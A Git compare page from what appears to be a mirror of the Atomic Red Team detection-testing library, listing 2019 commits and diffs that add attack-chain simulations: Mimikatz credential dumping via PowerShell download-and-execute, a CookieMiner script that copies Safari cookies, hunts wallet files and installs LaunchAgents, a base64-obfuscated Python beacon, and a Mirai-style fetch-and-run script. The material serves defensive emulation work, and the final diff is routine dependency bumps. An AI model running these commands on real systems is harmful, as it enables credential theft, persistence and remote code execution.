security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:update-PSDocs
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:admin-guide
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

57 Commits
update-PSDocs .. admin-guide

Author SHA1 Message Date
Keith McCammon f475ca3b1e Use site URL 2019-05-07 08:42:29 -06:00
Keith McCammon 0c4c29b19d Initial checkin of admin documentation. 2019-05-07 08:37:26 -06:00
CircleCI Atomic Red Team doc generator 9c8c2edcd8 Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-06 16:23:27 +00:00
Tony M Lambert 1585dccdfa T1489 Service Stop (#494) 
* Update ATT&CK json for technique creation

* T1489 - Service Stop
 2019-05-06 10:23:02 -06:00
CircleCI Atomic Red Team doc generator e049f7dc4b Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-06 16:17:00 +00:00
Tony M Lambert 76085a09b8 T1003 Add dumping of NTDS with VSC (#489) 2019-05-06 10:16:43 -06:00
CircleCI Atomic Red Team doc generator 29da400700 Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-06 16:15:35 +00:00
Tony M Lambert 7a25221960 Update ATT&CK json for technique creation (#488) 2019-05-06 10:15:22 -06:00
CircleCI Atomic Red Team doc generator e0a560ef90 Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-06 15:53:26 +00:00
mikajarvinen 58639f8058 Add ICMP exfiltration test to T1048 (#485) 2019-05-06 09:52:07 -06:00
Keith McCammon 43b2aa5b89 Fix repository URLs (#497) 
* Fix repository URLs

* Use Jeykll namespace for URLs
 2019-05-06 09:49:55 -06:00
mikajarvinen 66501f291f Fix docs/contributing.md pointing to non-existent spec.yaml (#484) 2019-05-06 08:57:17 -06:00
CircleCI Atomic Red Team doc generator d11bcc8331 Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-01 23:39:00 +00:00
Tony M Lambert 0557556dc0 T1141 PoSH Input Prompt from Stitch (#483) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Correct URL for DownloadString (#480)

The Get-Inbox.ps1 is not in the ARTifacts directory, it is in the directory for this technique

* Generate docs from job=validate_atomics_generate_docs branch=master

* T1141 - PoSH Input Prompt Stitch
 2019-05-01 19:38:44 -04:00
CircleCI Atomic Red Team doc generator 41a69411de Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-01 23:29:08 +00:00
Tony M Lambert 02b4186e1a T1099 - Timestomping with PowerShell (#482) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Correct URL for DownloadString (#480)

The Get-Inbox.ps1 is not in the ARTifacts directory, it is in the directory for this technique

* Generate docs from job=validate_atomics_generate_docs branch=master

* Added PoSH timestomp tests taken from Stitch RAT
 2019-05-01 19:28:52 -04:00
CircleCI Atomic Red Team doc generator 3b86c74353 Generate docs from job=validate_atomics_generate_docs branch=master 2019-05-01 23:27:33 +00:00
Glenn Barrett 20c416fc5e Correct URL for DownloadString (#479) 
The Get-Inbox.ps1 is not in the ARTifacts directory, it is in the directory for this technique
 2019-05-01 19:27:22 -04:00
CircleCI Atomic Red Team doc generator c658cc41cf Generate docs from job=validate_atomics_generate_docs branch=master 2019-04-30 18:22:16 +00:00
Tony M Lambert 2ddd610a61 Add T1082 vm check from Pupy (#481) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Add Linux guest vm checks

* case insensitivity
 2019-04-30 12:22:04 -06:00
CircleCI Atomic Red Team doc generator 2797ddabdc Generate docs from job=validate_atomics_generate_docs branch=master 2019-04-03 14:16:36 +00:00
Glenn Barrett ba8560206f Correct URL for DownloadString (#480) 
The Get-Inbox.ps1 is not in the ARTifacts directory, it is in the directory for this technique
 2019-04-03 08:15:59 -06:00
Michael Haag 16f6b633ce T1086 msxml (#471) 
* Update T1086.yaml

Modified test to have both. I think it's worth having two executions in this sense as it assists with validating remote (SOC/SIEM) detection + console (stdout) detection. I'm for modifying them all, but not sure the urgency.

Issue #466

* Generate docs from job=validate_atomics_generate_docs branch=T1086MSXML

* Fixed quotes

Fixed quotes per 2nd comment on #466

* Generate docs from job=validate_atomics_generate_docs branch=T1086MSXML
 2019-03-26 13:13:12 -07:00
Michael Haag 5f49684c43 Install fixes (#462) 
* Install fixes

Updated casing. Should be happier

* fix docs-invoke page

Fixing docs invoke page to match the other readme
 2019-03-26 13:13:05 -07:00
Michael Haag d91f2c1479 T1220 (#472) 
* T1220 Fix

T1220 fix per #467

* Generate docs from job=validate_atomics_generate_docs branch=T1220
 2019-03-26 13:12:58 -07:00
Michael Haag 820ed2e465 T1197 (#473) 
* Update T1197.yaml

Fixed issue #463
Fixed issue #464

* Generate docs from job=validate_atomics_generate_docs branch=t1197
 2019-03-26 13:12:49 -07:00
Michael Haag 0c3e47f7be T1100 and T1071 (#475) 
* Technique - T1071

First commit of T1071 - Standard Application Layer Protocols.
Specifically using powershell & Curl to simulate malicious user agents.

* Web Shell

Simple test of copying webshells from atomic dir to a path on the file system.

* typo

* Generate docs from job=validate_atomics_generate_docs branch=web
 2019-03-26 13:12:40 -07:00
Zac Brown 80e983e3d9 Update PyYAML to >= 4.2b1 due to security alert: https://nvd.nist.gov/vuln/detail/CVE-2017-18342 (#474) 2019-03-26 11:52:59 -06:00
Michael Haag f69ea2a586 T1022 Updates (#470) 
* T1022 Updates

Bypass PR #351 (some weird issue in there).
Update schema and tab completion.
Credit to @samuelmarticotteBELL

Thanks for the help!

* Update T1022.yaml

Fixed error

* Update T1022.yaml

space fix

* Generate docs from job=validate_atomics_generate_docs branch=T1022
 2019-03-26 10:52:37 -07:00
Michael Haag d258111402 BloodHound URLs - T1086 (#468) 
* URLs

Fix url's for issue #465

* Generate docs from job=validate_atomics_generate_docs branch=t1086
 2019-03-15 10:02:19 -04:00
caseysmithrc a668ff07d9 T1055 process injection (#460) 
* ProcessInjection-FiveAlive

* Generate docs from job=validate_atomics_generate_docs branch=T1055-ProcessInjection
 2019-02-17 14:45:00 -08:00
Michael Haag 818c2ce55d DragonsTail (#458) 
Updated URLs to fix #437
 2019-02-14 13:43:31 -08:00
Michael Haag 7e34cbe7df ART - Getting Started Made Easy (#459) 
* New Guide + Execution Script

Commit of new script and guide!

* Updated ReadMe

Updated Readme with new instructions

* Fixed typos

Typo gone and ready!
 2019-02-14 13:13:13 -08:00
Greg Foss 60bc6fd9e1 Add test for T1114 that extracts email from the local outlook instance (#456) 2019-02-13 22:10:54 -08:00
CircleCI Atomic Red Team doc generator a1c83527fb Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:10:46 +00:00
Keep Watcher 02dc3e41ab Certutil update (#452) 
* Fixing certutil syntax error

* Adding certutil download tests

* Adding commands to rename download for verifyctl argument

* Fixing type syntax
 2019-02-13 22:10:39 -08:00
CircleCI Atomic Red Team doc generator e0d70c657d Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:09:52 +00:00
Tony M Lambert d490f345a7 T1005 Safari CookieMiner Test (#454) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Added Safari cookie search CookieMiner test
 2019-02-13 22:09:44 -08:00
CircleCI Atomic Red Team doc generator f2d16ae0c7 Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:09:31 +00:00
Greg Foss 9b52b9ff4b T1074 update for OSX and Linux (#457) 
* Add test for T1114 that extracts email from the local outlook instance

* Update T1074 with Linux and OSX staged data tests
 2019-02-13 22:09:23 -08:00
Brian Beyer 7f9c193f6c update gems for security patches 2019-02-07 14:59:52 -07:00
Tony M Lambert 6566bb640a Chain Reaction for IoT Mirai Malware Derivative Infections (#449) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Mirai IoT Chain Reaction
 2019-02-06 10:52:56 -08:00
Michael Haag ec383fbb3c Install-AtomicRedTeam Script (#450) 
* Initial Commit

* Update install-atomicredteam.ps1

* Update install-atomicredteam.ps1

* Update install-atomicredteam.ps1

* Final

@caseysmithrc Please review.

* license fix

license update

* Update install-atomicredteam.ps1
 2019-02-06 10:52:40 -08:00
Tony M Lambert 8e2ec0aae1 CookieMiner Chain Reaction (#451) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* CookieMiner initial commit

* fix binary stuff

* Make quieter

* Ready for primetime
 2019-02-06 10:52:31 -08:00
caseysmithrc a53eb4d327 Update t1003 url (#405) 
* update url

* Generate docs from job=validate_atomics_generate_docs branch=Update-T1003-url
 2019-02-06 10:52:11 -08:00
CircleCI Atomic Red Team doc generator a69319c513 Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-05 21:05:39 +00:00
zpettry 0c445be847 Update T1088.md (#436) 
This test needs to use Powershell.
 2019-02-05 13:05:31 -08:00
CircleCI Atomic Red Team doc generator c7142a4487 Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-05 21:05:23 +00:00
Tony M Lambert b831127ab2 T1055 - Test for shared library injection on Linux (#448) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1055 - Added test for /etc/ld.so.preload addition
 2019-02-05 13:05:15 -08:00
CircleCI Atomic Red Team doc generator 895c6f2d4f Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-05 21:05:01 +00:00
Tony M Lambert 469372005c T1070 - Overwrite Mail Spool/Log File (#447) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1070 - Overwrite Mail/Log Tests from Rocke
 2019-02-05 13:04:53 -08:00
Tony M Lambert 0ff328c3ba T1107 - Filesystem Deletion from Amnesia malware (#446) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1107 - Delete Filesystem Test from Amnesia malware
 2019-02-05 13:04:44 -08:00
Tony M Lambert 8c7abb226e T1168 Improve Cron tests, add additional one (#445) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1168 - Improvements and additional cron tests
 2019-02-05 13:04:36 -08:00
Tony M Lambert 4212ca043e T1136 - useradd Linux test to replicate backdoor account from Butter (#444) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* T1136 - Added useradd Linux test to replicate Butter attacks pattern
 2019-02-05 13:04:27 -08:00
CircleCI Atomic Red Team doc generator 735447ace8 Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-05 21:04:08 +00:00
Keep Watcher 79494d45a7 Changing file extension to yaml to match content (#442) 2019-02-05 13:03:58 -08:00
Tony M Lambert 509bb5f3a1 T1222 - chattr test (#440) 2019-02-05 13:03:48 -08:00
101 changed files with 141044 additions and 100904 deletions
Expand all files Collapse all files
ARTifacts/Chain_Reactions/atomic-hello.macos
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+2 -2
View File
@@ -9,7 +9,7 @@
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+2 -2
View File
@@ -9,7 +9,7 @@
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
Gemfile.lock
+36 -37
View File
@@ -18,42 +18,43 @@ GEM
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.9)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.3)
dnsruby (1.60.2)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.11.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.2)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.9.25)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (186)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.3)
jekyll-avatar (= 0.5.0)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.9.3)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.3.0)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.13.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.4.0)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
@@ -70,12 +71,12 @@ GEM
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.9.0)
kramdown (= 1.16.2)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.4.1)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
@@ -85,13 +86,13 @@ GEM
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.8.0)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.3)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
@@ -104,7 +105,7 @@ GEM
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.5.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
@@ -118,15 +119,14 @@ GEM
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.9.3)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.3.0)
activesupport (~> 4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
@@ -134,7 +134,7 @@ GEM
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.13.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
@@ -143,7 +143,7 @@ GEM
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
